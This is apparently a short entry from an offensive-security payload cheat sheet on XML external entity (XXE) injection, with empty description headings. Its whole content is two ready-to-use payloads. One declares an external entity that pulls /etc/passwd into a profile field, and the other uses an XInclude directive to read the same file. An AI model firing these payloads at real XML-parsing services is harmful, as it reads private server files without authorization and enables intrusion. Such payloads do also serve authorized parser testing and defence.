XXE
Description
Payloads
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<profile>
<users>
<user>
<firstname>&xxe;</firstname>
<lastname>pass</lastname>
</user>
</users>
</profile><?xml version="1.0" encoding="UTF-8" ?>
<profile xmlns:xi="http://www.w3.org/2001/XInclude">
<users>
<user>
<firstname>
xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd" />
</firstname>
<lastname>DOE</lastname>
</user>
</users>
</profile>Last updated